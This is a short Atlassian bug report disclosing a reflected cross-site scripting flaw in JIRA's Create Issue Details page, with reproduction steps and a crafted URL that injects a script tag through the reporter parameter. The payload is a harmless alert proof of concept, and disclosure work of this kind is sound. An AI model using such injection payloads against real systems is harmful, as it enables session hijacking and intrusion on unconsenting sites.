Reflected XSS in Create Issue Details page

2012-10-10T01:10:23
ID ATLASSIAN:JRA-30039
Type atlassian
Reporter kburnett
Modified 2017-02-20T04:47:42

Description

The Create Issue Detail page is vulnerable to reflected XSS.

  1. Login to https://$JIRA/
  2. Visit https://$JIRA/secure/CreateIssueDetails.jspa?reporter="><script>alert('XSS')<%2Fscript><p+name%3D"&pid=10000&issuetype=2
  3. Accept XSRF token warning

For example, https://volcano.jira-dev.com/secure/CreateIssueDetails.jspa?reporter="><script>alert('XSS')<%2Fscript><p+name%3D"&pid=10000&issuetype=2